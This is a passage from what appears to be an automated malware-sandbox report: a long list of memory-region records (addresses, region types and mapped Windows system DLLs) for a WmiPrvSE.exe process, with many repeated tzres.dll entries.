0x280fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 2767 start_va = 0x290000 end_va = 0x29cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 2768 start_va = 0x2a0000 end_va = 0x2a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2769 start_va = 0x2c0000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2770 start_va = 0x2d0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 2771 start_va = 0x3d0000 end_va = 0x557fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 2772 start_va = 0x560000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2773 start_va = 0x6f0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 2774 start_va = 0x7b0000 end_va = 0xa7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2775 start_va = 0xa80000 end_va = 0xa82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 2776 start_va = 0xaa0000 end_va = 0xb1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 2777 start_va = 0xbe0000 end_va = 0xc5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2778 start_va = 0xcb0000 end_va = 0xd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 2779 start_va = 0xd60000 end_va = 0xddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 2780 start_va = 0xee0000 end_va = 0xf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 2781 start_va = 0xf90000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 2782 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 2783 start_va = 0x1160000 end_va = 0x125ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 2784 start_va = 0x72dd0000 end_va = 0x72dd2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 2785 start_va = 0x72de0000 end_va = 0x72de2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 2786 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2787 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2788 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2789 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2790 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2791 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2792 start_va = 0x13fd00000 end_va = 0x13fd6bfff monitored = 0 entry_point = 0x13fd3b450 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2793 start_va = 0x7fef07a0000 end_va = 0x7fef0999fff monitored = 0 entry_point = 0x7fef07b4c9c region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 2794 start_va = 0x7fef1530000 end_va = 0x7fef1537fff monitored = 0 entry_point = 0x7fef15311a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 2795 start_va = 0x7fef1540000 end_va = 0x7fef1551fff monitored = 0 entry_point = 0x7fef154aab8 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 2796 start_va = 0x7fef15b0000 end_va = 0x7fef15b9fff monitored = 0 entry_point = 0x7fef15b31c8 region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 2797 start_va = 0x7fef4eb0000 end_va = 0x7fef4ec1fff monitored = 0 entry_point = 0x7fef4eb89d0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2798 start_va = 0x7fef5000000 end_va = 0x7fef5020fff monitored = 0 entry_point = 0x7fef50103b0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2799 start_va = 0x7fef50a0000 end_va = 0x7fef50b2fff monitored = 0 entry_point = 0x7fef50a1d80 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2800 start_va = 0x7fef5310000 end_va = 0x7fef531dfff monitored = 0 entry_point = 0x7fef5315500 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2801 start_va = 0x7fef5320000 end_va = 0x7fef5346fff monitored = 0 entry_point = 0x7fef53211a0 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2802 start_va = 0x7fef5350000 end_va = 0x7fef5422fff monitored = 0 entry_point = 0x7fef53c8b00 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2803 start_va = 0x7fef56c0000 end_va = 0x7fef5736fff monitored = 0 entry_point = 0x7fef56fe7f0 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 2804 start_va = 0x7fef8210000 end_va = 0x7fef823bfff monitored = 0 entry_point = 0x7fef8228194 region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 2805 start_va = 0x7fef8240000 end_va = 0x7fef8282fff monitored = 0 entry_point = 0x7fef8261b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2806 start_va = 0x7fef99e0000 end_va = 0x7fef99eefff monitored = 0 entry_point = 0x7fef99e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2807 start_va = 0x7fefb300000 end_va = 0x7fefb30bfff monitored = 0 entry_point = 0x7fefb3015d8 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 2808 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2809 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2810 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2811 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2812 start_va = 0x7fefb970000 end_va = 0x7fefb985fff monitored = 0 entry_point = 0x7fefb9711a0 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 2813 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2814 start_va = 0x7fefc740000 end_va = 0x7fefc76cfff monitored = 0 entry_point = 0x7fefc741010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2815 start_va = 0x7fefcc40000 end_va = 0x7fefcc49fff monitored = 0 entry_point = 0x7fefcc43cb8 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 2816 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2817 start_va = 0x7fefcdd0000 end_va = 0x7fefce26fff monitored = 0 entry_point = 0x7fefcdd5e38 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 2818 start_va = 0x7fefce30000 end_va = 0x7fefce5ffff monitored = 0 entry_point = 0x7fefce3194c region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 2819 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2820 start_va = 0x7fefd190000 end_va = 0x7fefd1b1fff monitored = 0 entry_point = 0x7fefd195d30 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2821 start_va = 0x7fefd540000 end_va = 0x7fefd562fff monitored = 0 entry_point = 0x7fefd541198 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 2822 start_va = 0x7fefd5e0000 end_va = 0x7fefd5eafff monitored = 0 entry_point = 0x7fefd5e1030 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2823 start_va = 0x7fefd610000 end_va = 0x7fefd634fff monitored = 0 entry_point = 0x7fefd619658 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2824 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2825 start_va = 0x7fefd6f0000 end_va = 0x7fefd72cfff monitored = 0 entry_point = 0x7fefd6f18f4 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2826 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2827 start_va = 0x7fefd7f0000 end_va = 0x7fefd7fefff monitored = 0 entry_point = 0x7fefd7f1020 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2828 start_va = 0x7fefd800000 end_va = 0x7fefd96cfff monitored = 0 entry_point = 0x7fefd8010b4 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2829 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2830 start_va = 0x7fefd9e0000 end_va = 0x7fefda1afff monitored = 0 entry_point = 0x7fefd9e1324 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 2831 start_va = 0x7fefda20000 end_va = 0x7fefda55fff monitored = 0 entry_point = 0x7fefda21474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2832 start_va = 0x7fefda60000 end_va = 0x7fefda79fff monitored = 0 entry_point = 0x7fefda61558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2833 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2834 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2835 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2836 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2837 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2838 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2839 start_va = 0x7feff130000 end_va = 0x7feff137fff monitored = 0 entry_point = 0x7feff131504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2840 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2841 start_va = 0x7feff180000 end_va = 0x7feff1d1fff monitored = 0 entry_point = 0x7feff1810d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 2842 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2843 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2844 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2845 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2846 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2847 start_va = 0x7feff680000 end_va = 0x7feff856fff monitored = 0 entry_point = 0x7feff681010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 2848 start_va = 0x7feffac0000 end_va = 0x7feffb0cfff monitored = 0 entry_point = 0x7feffac1070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2849 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2850 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 2851 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2852 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2853 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 2854 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 2855 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 2856 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 2857 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 2858 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 2859 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3030 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3031 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3032 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3033 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3034 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3035 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3036 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3037 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3038 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3039 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3040 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3041 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3042 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3044 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3045 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3046 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3047 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3048 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3049 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3050 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3051 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3052 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3053 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3054 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3055 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3056 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3057 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3059 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3060 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3061 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3062 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3063 start_va = 0x2b0000 end_va = 0x2b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 3064 start_va = 0x2a0000 end_va = 0x2a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3065 